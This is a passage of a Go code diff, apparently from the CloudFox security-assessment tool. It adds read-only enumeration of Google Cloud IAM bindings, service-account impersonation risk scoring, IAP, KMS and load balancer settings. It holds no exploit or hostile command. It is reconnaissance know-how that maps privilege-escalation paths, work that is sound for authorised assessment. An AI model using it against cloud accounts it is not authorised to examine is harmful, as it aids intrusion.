switch role { + case "roles/iam.serviceAccountTokenCreator": + info.TokenCreators = append(info.TokenCreators, members...) 
+ case "roles/iam.serviceAccountKeyAdmin": + info.KeyCreators = append(info.KeyCreators, members...) + info.SAAdmins = append(info.SAAdmins, members...) + case "roles/iam.serviceAccountAdmin": + info.SAAdmins = append(info.SAAdmins, members...) + info.TokenCreators = append(info.TokenCreators, members...) + info.KeyCreators = append(info.KeyCreators, members...) + case "roles/iam.serviceAccountUser": + info.ActAsUsers = append(info.ActAsUsers, members...) + case "roles/owner", "roles/editor": + // These grant broad SA access + info.SAAdmins = append(info.SAAdmins, members...) + } + } + + // Calculate risk level + info.RiskLevel, info.RiskReasons = calculateSAImpersonationRisk(info) + + return info, nil +} + +// GetAllServiceAccountImpersonation analyzes impersonation risks for all SAs in a project +func (s *IAMService) GetAllServiceAccountImpersonation(projectID string) ([]SAImpersonationInfo, error) { + ctx := context.Background() + + // Get all service accounts (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + return nil, err + } + + var results []SAImpersonationInfo + + for _, sa := range serviceAccounts { + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but don't fail - we might not have permission + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not get IAM policy for SA %s", sa.Email)) + continue + } + results = append(results, *info) + } + + return results, nil +} + +// ServiceAccountsWithImpersonation returns service accounts with impersonation analysis +func (s *IAMService) ServiceAccountsWithImpersonation(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + + // Get base service account info (without keys - impersonation analysis doesn't need them) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err != nil { + return nil, err + } + + 
// Enrich with impersonation info + for i := range serviceAccounts { + sa := &serviceAccounts[i] + + info, err := s.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + // Log but continue + continue + } + + // Populate impersonation fields + sa.CanGetAccessTokenBy = info.TokenCreators + sa.CanCreateKeysBy = info.KeyCreators + sa.CanSignBlobBy = info.SignBlobUsers + sa.CanSignJwtBy = info.SignJwtUsers + + // Combine all impersonation paths + allImpersonators := make(map[string]bool) + for _, m := range info.TokenCreators { + allImpersonators[m] = true + } + for _, m := range info.KeyCreators { + allImpersonators[m] = true + } + for _, m := range info.SignBlobUsers { + allImpersonators[m] = true + } + for _, m := range info.SignJwtUsers { + allImpersonators[m] = true + } + for _, m := range info.SAAdmins { + allImpersonators[m] = true + } + + for m := range allImpersonators { + sa.CanBeImpersonatedBy = append(sa.CanBeImpersonatedBy, m) + } + + sa.HasImpersonationRisk = len(sa.CanBeImpersonatedBy) > 0 + sa.ImpersonationRiskLevel = info.RiskLevel + } + + return serviceAccounts, nil +} + +func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) { + var reasons []string + score := 0 + + // Token creators are critical - direct impersonation + if len(info.TokenCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can get access tokens (impersonate)", len(info.TokenCreators))) + score += 3 + + // Check for public access + for _, m := range info.TokenCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + reasons = append(reasons, "PUBLIC can impersonate this SA!") + score += 5 + } + } + } + + // Key creators are critical - persistent access + if len(info.KeyCreators) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can create keys (persistent access)", len(info.KeyCreators))) + score += 3 + + for _, m := range info.KeyCreators { + if m == "allUsers" || m == "allAuthenticatedUsers" { + 
reasons = append(reasons, "PUBLIC can create keys for this SA!") + score += 5 + } + } + } + + // SignBlob/SignJwt - can forge tokens + if len(info.SignBlobUsers) > 0 || len(info.SignJwtUsers) > 0 { + reasons = append(reasons, "Principals can sign blobs/JWTs (token forgery)") + score += 2 + } + + // SA Admins + if len(info.SAAdmins) > 0 { + reasons = append(reasons, fmt.Sprintf("%d SA admin(s)", len(info.SAAdmins))) + score += 1 + } + + // ActAs users (needed for attaching SA to resources) + if len(info.ActAsUsers) > 0 { + reasons = append(reasons, fmt.Sprintf("%d principal(s) can actAs this SA", len(info.ActAsUsers))) + score += 1 + } + + if score >= 5 { + return "CRITICAL", reasons + } else if score >= 3 { + return "HIGH", reasons + } else if score >= 2 { + return "MEDIUM", reasons + } else if score >= 1 { + return "LOW", reasons + } + return "INFO", reasons +} + +// ============================================================================ +// Organization and Folder IAM Enumeration +// ============================================================================ + +// ScopeBinding represents an IAM binding with full scope information +type ScopeBinding struct { + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The ID of the scope + ScopeName string `json:"scopeName"` // Display name of the scope + Member string `json:"member"` // Full member identifier + MemberType string `json:"memberType"` // User, ServiceAccount, Group, etc. 
+ MemberEmail string `json:"memberEmail"` // Clean email + Role string `json:"role"` + IsCustom bool `json:"isCustom"` + HasCondition bool `json:"hasCondition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` +} + +// OrgFolderIAMData holds IAM bindings from organizations and folders +type OrgFolderIAMData struct { + Organizations []ScopeBinding `json:"organizations"` + Folders []ScopeBinding `json:"folders"` + OrgNames map[string]string `json:"orgNames"` // orgID -> displayName + FolderNames map[string]string `json:"folderNames"` // folderID -> displayName +} + +// GetOrganizationIAM gets IAM bindings for all accessible organizations +func (s *IAMService) GetOrganizationIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + orgNames := make(map[string]string) + + // First, search for accessible organizations + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for organization search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, 
&iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "organization", + ScopeID: orgID, + ScopeName: org.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, orgNames, nil +} + +// GetFolderIAM gets IAM bindings for all accessible folders +func (s *IAMService) GetFolderIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + folderNames := make(map[string]string) + + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Search for all folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for folder search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + 
folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "folder", + ScopeID: folderID, + ScopeName: folder.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, folderNames, nil +} + +// GetAllScopeIAM gets IAM bindings from organizations, folders, and projects +func (s *IAMService) GetAllScopeIAM(ctx context.Context, projectIDs []string, projectNames map[string]string) ([]ScopeBinding, error) { + var allBindings []ScopeBinding + + // Get organization IAM + orgBindings, _, err := s.GetOrganizationIAM(ctx) + if err != nil { + // Log but continue - we might not have org access + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate organization IAM") + } else { + allBindings = append(allBindings, orgBindings...) + } + + // Get folder IAM + folderBindings, _, err := s.GetFolderIAM(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate folder IAM") + } else { + allBindings = append(allBindings, folderBindings...) 
+ } + + // Get project IAM for each project + for _, projectID := range projectIDs { + projectBindings, err := s.Policies(projectID, "project") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM for project %s", projectID)) + continue + } + + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + for _, pb := range projectBindings { + for _, member := range pb.Members { + sb := ScopeBinding{ + ScopeType: "project", + ScopeID: projectID, + ScopeName: projectName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: pb.Role, + IsCustom: isCustomRole(pb.Role), + } + if pb.HasCondition && pb.ConditionInfo != nil { + sb.HasCondition = true + sb.ConditionInfo = pb.ConditionInfo + } + allBindings = append(allBindings, sb) + } + } + } + + return allBindings, nil +} + +// ============================================================================ +// MFA Status Lookup via Cloud Identity API +// ============================================================================ + +// MFAStatus represents the MFA status for a user +type MFAStatus struct { + Email string `json:"email"` + HasMFA bool `json:"hasMfa"` + MFAType string `json:"mfaType"` // 2SV method type + Enrolled bool `json:"enrolled"` // Whether 2SV is enrolled + Enforced bool `json:"enforced"` // Whether 2SV is enforced by policy + LastUpdate string `json:"lastUpdate"` + Error string `json:"error"` // Error message if lookup failed +} + +// GetUserMFAStatus attempts to get MFA status for a user via Cloud Identity API +// This requires cloudidentity.users.get or admin.directory.users.get permission +func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFAStatus, error) { + status := &MFAStatus{ + Email: email, + } + + // Cloud Identity doesn't directly expose 2SV status + // We need to use the Admin SDK Directory API 
which requires admin privileges + // For now, we'll attempt to look up the user and note if we can't + + ciService, err := s.getCloudIdentityService(ctx) + if err != nil { + status.Error = "Cloud Identity API not accessible" + return status, nil + } + + // Try to look up the user - this gives us some info but not 2SV status directly + // The Admin SDK would be needed for full 2SV info + lookupReq := ciService.Groups.Lookup() + // We can't directly query user 2SV via Cloud Identity + // This would require Admin SDK with admin.directory.users.get + _ = lookupReq + + status.Error = "2SV status requires Admin SDK access" + return status, nil +} + +// GetBulkMFAStatus attempts to get MFA status for multiple users +// Returns a map of email -> MFAStatus +func (s *IAMService) GetBulkMFAStatus(ctx context.Context, emails []string) map[string]*MFAStatus { + results := make(map[string]*MFAStatus) + + for _, email := range emails { + // Skip non-user emails (service accounts, groups, etc.) + if strings.HasSuffix(email, ".iam.gserviceaccount.com") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A (service account)", + } + continue + } + if strings.Contains(email, "group") || !strings.Contains(email, "@") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A", + } + continue + } + + status, _ := s.GetUserMFAStatus(ctx, email) + results[email] = status + } + + return results +} + +// ============================================================================ +// Enhanced Combined IAM with All Scopes +// ============================================================================ + +// EnhancedIAMData holds comprehensive IAM data including org/folder bindings +type EnhancedIAMData struct { + ScopeBindings []ScopeBinding `json:"scopeBindings"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + MFAStatus map[string]*MFAStatus `json:"mfaStatus"` +} + +// 
CombinedIAMEnhanced retrieves all IAM-related data including org/folder bindings +func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []string, projectNames map[string]string) (EnhancedIAMData, error) { + var data EnhancedIAMData + data.MFAStatus = make(map[string]*MFAStatus) + + // Get all scope bindings (org, folder, project) + scopeBindings, err := s.GetAllScopeIAM(ctx, projectIDs, projectNames) + if err != nil { + return data, fmt.Errorf("failed to get scope bindings: %v", err) + } + data.ScopeBindings = scopeBindings + + // Collect unique user emails for MFA lookup + userEmails := make(map[string]bool) + for _, sb := range scopeBindings { + if sb.MemberType == "User" { + userEmails[sb.MemberEmail] = true + } + } + + // Get MFA status for users (best effort) + var emailList []string + for email := range userEmails { + emailList = append(emailList, email) + } + data.MFAStatus = s.GetBulkMFAStatus(ctx, emailList) + + // Get service accounts and custom roles for each project + for _, projectID := range projectIDs { + // Service accounts (without keys) + serviceAccounts, err := s.ServiceAccountsBasic(projectID) + if err == nil { + data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) + } + + // Custom roles + customRoles, err := s.CustomRoles(projectID) + if err == nil { + data.CustomRoles = append(data.CustomRoles, customRoles...) 
+ } + } + + // Extract groups from scope bindings + groupMap := make(map[string]*GroupInfo) + for _, sb := range scopeBindings { + if sb.MemberType == "Group" { + if _, exists := groupMap[sb.MemberEmail]; !exists { + groupMap[sb.MemberEmail] = &GroupInfo{ + Email: sb.MemberEmail, + ProjectID: sb.ScopeID, // Use first scope where seen + Roles: []string{}, + } + } + groupMap[sb.MemberEmail].Roles = append(groupMap[sb.MemberEmail].Roles, sb.Role) + } + } + for _, g := range groupMap { + data.Groups = append(data.Groups, *g) + } + + return data, nil +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go new file mode 100644 index 00000000..a7394a58 --- /dev/null +++ b/gcp/services/iapService/iapService.go @@ -0,0 +1,172 @@ +package iapservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" + iap "google.golang.org/api/iap/v1" +) + +type IAPService struct { + session *gcpinternal.SafeSession +} + +func New() *IAPService { + return &IAPService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *IAPService { + return &IAPService{session: session} +} + +// getService returns an IAP service client using cached session if available +func (s *IAPService) getService(ctx context.Context) (*iap.Service, error) { + if s.session != nil { + return sdk.CachedGetIAPService(ctx, s.session) + } + return iap.NewService(ctx) +} + +// IAPSettingsInfo represents IAP settings for a resource +type IAPSettingsInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + ResourceType string `json:"resourceType"` // compute, app-engine, etc. 
+ ResourceName string `json:"resourceName"` + IAPEnabled bool `json:"iapEnabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + OAuth2ClientSecretSha string `json:"oauth2ClientSecretSha"` + AccessDeniedPageURI string `json:"accessDeniedPageUri"` + CORSAllowedOrigins []string `json:"corsAllowedOrigins"` + GCIPTenantIDs []string `json:"gcipTenantIds"` + ReauthPolicy string `json:"reauthPolicy"` +} + +// TunnelDestGroup represents an IAP tunnel destination group +type TunnelDestGroup struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Region string `json:"region"` + CIDRs []string `json:"cidrs"` + FQDNs []string `json:"fqdns"` + IAMBindings []IAMBinding `json:"iamBindings"` +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string `json:"role"` + Member string `json:"member"` +} + +// ListTunnelDestGroups retrieves tunnel destination groups +func (s *IAPService) ListTunnelDestGroups(projectID string) ([]TunnelDestGroup, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + var groups []TunnelDestGroup + + // Get regions from regionService (with automatic fallback) + // Also try "-" wildcard in case it's supported + regions := regionservice.GetCachedRegionNames(ctx, projectID) + regions = append(regions, "-") + + for _, region := range regions { + parent := fmt.Sprintf("projects/%s/iap_tunnel/locations/%s", projectID, region) + resp, err := service.Projects.IapTunnel.Locations.DestGroups.List(parent).Context(ctx).Do() + if err != nil { + continue + } + + for _, group := range resp.TunnelDestGroups { + info := TunnelDestGroup{ + Name: extractName(group.Name), + ProjectID: projectID, + Region: region, + CIDRs: group.Cidrs, + FQDNs: group.Fqdns, + } + + // Fetch IAM bindings for this tunnel dest group + info.IAMBindings = s.getTunnelDestGroupIAMBindings(service, group.Name) + + groups = 
append(groups, info) + } + } + + return groups, nil +} + +// getTunnelDestGroupIAMBindings retrieves IAM bindings for a tunnel destination group +func (s *IAPService) getTunnelDestGroupIAMBindings(service *iap.Service, resourceName string) []IAMBinding { + ctx := context.Background() + + policy, err := service.V1.GetIamPolicy(resourceName, &iap.GetIamPolicyRequest{}).Context(ctx).Do() + if err != nil { + return nil + } + + var bindings []IAMBinding + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + } + } + + return bindings +} + +// GetIAPSettings retrieves IAP settings for a resource +func (s *IAPService) GetIAPSettings(projectID, resourcePath string) (*IAPSettingsInfo, error) { + ctx := context.Background() + + service, err := s.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + settings, err := service.V1.GetIapSettings(resourcePath).Context(ctx).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "iap.googleapis.com") + } + + info := &IAPSettingsInfo{ + Name: settings.Name, + ProjectID: projectID, + ResourceName: resourcePath, + } + + if settings.AccessSettings != nil { + if settings.AccessSettings.OauthSettings != nil { + info.OAuth2ClientID = settings.AccessSettings.OauthSettings.LoginHint + } + // CorsSettings doesn't have AllowHttpOptions as a list - it's a bool + // Skip CORS parsing for now + if settings.AccessSettings.GcipSettings != nil { + info.GCIPTenantIDs = settings.AccessSettings.GcipSettings.TenantIds + } + if settings.AccessSettings.ReauthSettings != nil { + info.ReauthPolicy = settings.AccessSettings.ReauthSettings.Method + } + } + + return info, nil +} + +func extractName(fullPath string) string { + parts := strings.Split(fullPath, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullPath +} diff --git 
a/gcp/services/kmsService/kmsService.go b/gcp/services/kmsService/kmsService.go new file mode 100644 index 00000000..a3d3bec8 --- /dev/null +++ b/gcp/services/kmsService/kmsService.go @@ -0,0 +1,297 @@ +package kmsservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + kms "google.golang.org/api/cloudkms/v1" +) + +type KMSService struct{ + session *gcpinternal.SafeSession +} + +func New() *KMSService { + return &KMSService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *KMSService { + return &KMSService{ + session: session, + } +} + +// getService returns a KMS service client using cached session if available +func (ks *KMSService) getService(ctx context.Context) (*kms.Service, error) { + if ks.session != nil { + return sdk.CachedGetKMSService(ctx, ks.session) + } + return kms.NewService(ctx) +} + +// KeyRingInfo holds KMS key ring details +type KeyRingInfo struct { + Name string + ProjectID string + Location string + CreateTime string + + // Keys in this key ring + KeyCount int +} + +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string +} + +// CryptoKeyInfo holds KMS crypto key details with security-relevant information +type CryptoKeyInfo struct { + Name string + ProjectID string + Location string + KeyRing string + Purpose string // ENCRYPT_DECRYPT, ASYMMETRIC_SIGN, ASYMMETRIC_DECRYPT, MAC + CreateTime string + + // Version info + PrimaryVersion string + PrimaryState string + VersionCount int + + // Security configuration + RotationPeriod string + NextRotationTime string + DestroyScheduledDuration string + ProtectionLevel string // SOFTWARE, HSM, EXTERNAL, EXTERNAL_VPC + + // Import info (indicates external key import) + ImportOnly bool + + // Labels + Labels map[string]string + + // IAM + IAMBindings []IAMBinding + IsPublicEncrypt bool + IsPublicDecrypt bool +} + +// KeyRings 
retrieves all KMS key rings in a project +func (ks *KMSService) KeyRings(projectID string) ([]KeyRingInfo, error) { + ctx := context.Background() + + service, err := ks.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keyRings []KeyRingInfo + + // List key rings across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + call := service.Projects.Locations.KeyRings.List(parent) + err = call.Pages(ctx, func(page *kms.ListKeyRingsResponse) error { + for _, kr := range page.KeyRings { + info := parseKeyRingInfo(kr, projectID) + + // Get key count for this key ring + keyCount, _ := ks.getKeyCount(service, kr.Name) + info.KeyCount = keyCount + + keyRings = append(keyRings, info) + } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + return keyRings, nil +} + +// CryptoKeys retrieves all crypto keys in a project +func (ks *KMSService) CryptoKeys(projectID string) ([]CryptoKeyInfo, error) { + ctx := context.Background() + + service, err := ks.getService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudkms.googleapis.com") + } + + var keys []CryptoKeyInfo + + // First get all key rings + keyRings, err := ks.KeyRings(projectID) + if err != nil { + return nil, err + } + + // Then get keys from each key ring + for _, kr := range keyRings { + keyRingName := fmt.Sprintf("projects/%s/locations/%s/keyRings/%s", projectID, kr.Location, kr.Name) + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err = call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + for _, key := range page.CryptoKeys { + info := parseCryptoKeyInfo(key, projectID, kr.Location, kr.Name) + + // Try to get IAM policy + iamPolicy, iamErr := ks.getKeyIAMPolicy(service, key.Name) + if iamErr == nil && iamPolicy != nil { + info.IAMBindings, info.IsPublicEncrypt, info.IsPublicDecrypt = 
parseKeyBindings(iamPolicy) + } + + keys = append(keys, info) + } + return nil + }) + + if err != nil { + // Log but continue with other key rings + _ = err // Error from listing keys in this key ring - permission or API issue + continue + } + } + + return keys, nil +} + +// parseKeyRingInfo extracts relevant information from a KMS key ring +func parseKeyRingInfo(kr *kms.KeyRing, projectID string) KeyRingInfo { + info := KeyRingInfo{ + Name: extractName(kr.Name), + ProjectID: projectID, + CreateTime: kr.CreateTime, + } + + // Extract location from key ring name + // Format: projects/{project}/locations/{location}/keyRings/{keyRing} + parts := strings.Split(kr.Name, "/") + if len(parts) >= 4 { + info.Location = parts[3] + } + + return info +} + +// parseCryptoKeyInfo extracts relevant information from a KMS crypto key +func parseCryptoKeyInfo(key *kms.CryptoKey, projectID, location, keyRing string) CryptoKeyInfo { + info := CryptoKeyInfo{ + Name: extractName(key.Name), + ProjectID: projectID, + Location: location, + KeyRing: keyRing, + Purpose: key.Purpose, + CreateTime: key.CreateTime, + Labels: key.Labels, + ImportOnly: key.ImportOnly, + } + + // Rotation configuration + if key.RotationPeriod != "" { + info.RotationPeriod = key.RotationPeriod + } + if key.NextRotationTime != "" { + info.NextRotationTime = key.NextRotationTime + } + + // Destroy scheduled duration + if key.DestroyScheduledDuration != "" { + info.DestroyScheduledDuration = key.DestroyScheduledDuration + } + + // Primary version info + if key.Primary != nil { + info.PrimaryVersion = extractVersionNumber(key.Primary.Name) + info.PrimaryState = key.Primary.State + info.ProtectionLevel = key.Primary.ProtectionLevel + } + + // Version template for protection level + if info.ProtectionLevel == "" && key.VersionTemplate != nil { + info.ProtectionLevel = key.VersionTemplate.ProtectionLevel + } + + return info +} + +// getKeyCount gets the number of crypto keys in a key ring +func (ks *KMSService) 
getKeyCount(service *kms.Service, keyRingName string) (int, error) { + ctx := context.Background() + count := 0 + + call := service.Projects.Locations.KeyRings.CryptoKeys.List(keyRingName) + err := call.Pages(ctx, func(page *kms.ListCryptoKeysResponse) error { + count += len(page.CryptoKeys) + return nil + }) + + if err != nil { + return 0, err + } + + return count, nil +} + +// getKeyIAMPolicy retrieves the IAM policy for a crypto key +func (ks *KMSService) getKeyIAMPolicy(service *kms.Service, keyName string) (*kms.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.KeyRings.CryptoKeys.GetIamPolicy(keyName).Context(ctx).Do() + if err != nil { + return nil, err + } + + return policy, nil +} + +// parseKeyBindings extracts all IAM bindings and checks for public access +func parseKeyBindings(policy *kms.Policy) (bindings []IAMBinding, publicEncrypt bool, publicDecrypt bool) { + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on encrypt/decrypt roles + if member == "allUsers" || member == "allAuthenticatedUsers" { + switch binding.Role { + case "roles/cloudkms.cryptoKeyEncrypter": + publicEncrypt = true + case "roles/cloudkms.cryptoKeyDecrypter": + publicDecrypt = true + case "roles/cloudkms.cryptoKeyEncrypterDecrypter": + publicEncrypt = true + publicDecrypt = true + } + } + } + } + return +} + +// extractName extracts just the resource name from the full resource name +func extractName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// extractVersionNumber extracts the version number from a crypto key version name +func extractVersionNumber(versionName string) string { + parts := strings.Split(versionName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return 
versionName +} diff --git a/gcp/services/loadbalancerService/loadbalancerService.go b/gcp/services/loadbalancerService/loadbalancerService.go new file mode 100644 index 00000000..3ac8d6cb --- /dev/null +++ b/gcp/services/loadbalancerService/loadbalancerService.go @@ -0,0 +1,276 @@ +package loadbalancerservice + +import ( + "context" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + compute "google.golang.org/api/compute/v1" +) + +type LoadBalancerService struct { + session *gcpinternal.SafeSession +} + +func New() *LoadBalancerService { + return &LoadBalancerService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *LoadBalancerService { + return &LoadBalancerService{session: session} +} + +// getService returns a Compute service client using cached session if available +func (s *LoadBalancerService) getService(ctx context.Context) (*compute.Service, error) { + if s.session != nil { + return sdk.CachedGetComputeService(ctx, s.session) + } + return compute.NewService(ctx) +} + +// LoadBalancerInfo represents a load balancer configuration +type LoadBalancerInfo struct { + Name string `json:"name"` + ProjectID string `json:"projectId"` + Type string `json:"type"` // HTTP, HTTPS, TCP, SSL, UDP, INTERNAL + Scheme string `json:"scheme"` // EXTERNAL, INTERNAL + Region string `json:"region"` // global or regional + IPAddress string `json:"ipAddress"` + Port string `json:"port"` + Protocol string `json:"protocol"` + + // Backend info + BackendServices []string `json:"backendServices"` + BackendBuckets []string `json:"backendBuckets"` + HealthChecks []string `json:"healthChecks"` + + // SSL/TLS config + SSLPolicy string `json:"sslPolicy"` + SSLCertificates []string `json:"sslCertificates"` + MinTLSVersion string `json:"minTlsVersion"` + + // Security config + SecurityPolicy string `json:"securityPolicy"` // Cloud Armor +} + +// SSLPolicyInfo represents an SSL policy +type SSLPolicyInfo 
struct {
	Name           string   `json:"name"`
	ProjectID      string   `json:"projectId"`
	MinTLSVersion  string   `json:"minTlsVersion"`
	Profile        string   `json:"profile"` // COMPATIBLE, MODERN, RESTRICTED, CUSTOM
	CustomFeatures []string `json:"customFeatures"`
}

// BackendServiceInfo represents a backend service
type BackendServiceInfo struct {
	Name               string   `json:"name"`
	ProjectID          string   `json:"projectId"`
	Protocol           string   `json:"protocol"`
	Port               int64    `json:"port"`
	HealthCheck        string   `json:"healthCheck"`
	SecurityPolicy     string   `json:"securityPolicy"`
	EnableCDN          bool     `json:"enableCdn"`
	SessionAffinity    string   `json:"sessionAffinity"`
	ConnectionDraining int64    `json:"connectionDraining"`
	Backends           []string `json:"backends"`
}

// regionFromScope translates an aggregated-list scope key (e.g. "regions/us-central1")
// into a bare region name, falling back to the supplied default for non-region scopes.
func regionFromScope(scope, fallback string) string {
	if strings.HasPrefix(scope, "regions/") {
		return strings.TrimPrefix(scope, "regions/")
	}
	return fallback
}

// ListLoadBalancers retrieves all load balancers in a project
func (s *LoadBalancerService) ListLoadBalancers(projectID string) ([]LoadBalancerInfo, error) {
	ctx := context.Background()

	service, err := s.getService(ctx)
	if err != nil {
		return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com")
	}

	var results []LoadBalancerInfo

	// Global forwarding rules cover external HTTP(S), SSL-proxy and TCP-proxy LBs.
	// A failure here is non-fatal; the regional enumeration below may still succeed.
	if globalRules, gerr := service.GlobalForwardingRules.List(projectID).Context(ctx).Do(); gerr == nil {
		for _, fwdRule := range globalRules.Items {
			results = append(results, s.parseForwardingRule(fwdRule, projectID, "global"))
		}
	}

	// Regional forwarding rules (internal and network LBs) via AggregatedList,
	// which needs only compute.forwardingRules.list (not compute.regions.list).
	aggCall := service.ForwardingRules.AggregatedList(projectID)
	_ = aggCall.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error {
		for scopeName, scoped := range page.Items {
			if scoped.ForwardingRules == nil {
				continue
			}
